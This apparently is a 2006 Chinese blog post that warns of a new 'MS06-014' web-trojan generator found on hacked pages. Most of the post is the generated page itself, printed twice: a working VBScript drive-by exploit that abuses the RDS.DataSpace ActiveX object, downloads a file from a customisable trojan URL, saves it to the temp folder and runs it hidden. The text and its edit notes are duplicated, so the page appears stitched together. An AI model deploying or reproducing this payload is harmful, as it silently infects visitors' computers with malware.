百度被放马?(Version 2)
XX,你好
最近在一些被黑的网页中,陆续看到了一些新的代码。查了一下这些代码的来源,发现都是用一款叫MS06-014网马生成器生成的网页,相信会成为脚本小子们近阶段的新工具。
目前从网上可以下载到好几个版本,我也下了一个,如图:
会生成一个htm的页面,代码如下:
其他的版本与此基本类似。
Version 1 published on 13:19 Aug.16 2006
最后编辑: 小陌 编辑于2006/08/16 13:20
目前从网上可以下载到好几个版本,我也下了一个,如图:
会生成一个htm的页面,代码如下:
<html>
<head>
<script language="VBScript">
on error resume next
download = "http://www.cisrt.org/"(自定义下载木马)
Set dE = document.createElement("object")
dE.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set str = dE.CreateObject(str,"")
str1="Ado"
str2="db."
str3="Str"
str4="eam"
str5=str1&str2&str3&str4
str6=str5
set S = dE.createobject(str6,"")
S.type = 1
str7="GET"
str.Open str7, download, False
str.Send
filename="Nonsenser.Com" (保存到电脑中的文件名)
set Fso = dE.createobject("Scripting.FileSystemObject","")
set tmp = Fso.GetSpecialFolder(2)
filename= Fso.BuildPath(tmp,filename)
S.open
S.write str.responseBody
S.savetofile filename,2
S.close
set Exe = dE.createobject("Shell.Application","")
Exe.ShellExecute filename,"","","open",0
</script></html>
<head>
<script language="VBScript">
on error resume next
download = "http://www.cisrt.org/"(自定义下载木马)
Set dE = document.createElement("object")
dE.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set str = dE.CreateObject(str,"")
str1="Ado"
str2="db."
str3="Str"
str4="eam"
str5=str1&str2&str3&str4
str6=str5
set S = dE.createobject(str6,"")
S.type = 1
str7="GET"
str.Open str7, download, False
str.Send
filename="Nonsenser.Com" (保存到电脑中的文件名)
set Fso = dE.createobject("Scripting.FileSystemObject","")
set tmp = Fso.GetSpecialFolder(2)
filename= Fso.BuildPath(tmp,filename)
S.open
S.write str.responseBody
S.savetofile filename,2
S.close
set Exe = dE.createobject("Shell.Application","")
Exe.ShellExecute filename,"","","open",0
</script></html>
其他的版本与此基本类似。
Version 1 published on 13:19 Aug.16 2006
最后编辑: 小陌 编辑于2006/08/16 13:20
